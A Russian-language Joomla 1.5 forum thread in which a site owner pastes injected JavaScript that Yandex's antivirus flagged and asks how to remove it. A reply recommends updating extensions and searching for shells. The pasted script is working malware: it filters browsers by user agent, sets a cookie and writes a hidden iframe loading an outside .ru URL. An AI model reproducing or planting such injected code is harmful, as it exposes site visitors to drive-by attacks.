Вредоносный код - Joomla 1.5: Настройка и оптимизация

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания:

/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset))!== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';
blackList = blackList.split('|');




var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList)!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('b19ad018sc');
if (cookie == undefined) {
setCookie('b19ad018sc', true, 292200);   
document.write('<iframe height="115" style="position:absolute;left:-1000px;top:-1000px;" width="115" src="http://braggingallyou.ru/7ytfjh.YWUkdtKG?default"></iframe>');
}
};
})();/*eaa795220*

Подскажите, пожалуйста, где его найти и как избавиться?

Обновить JCE и расширения с nonumber framework. А потом удалить шеллы и внедрения кода. Искать можно код в тотал коммандере хотя бы. Или notepad ++. Если сам не можете, обратитесь в коммерческий раздел.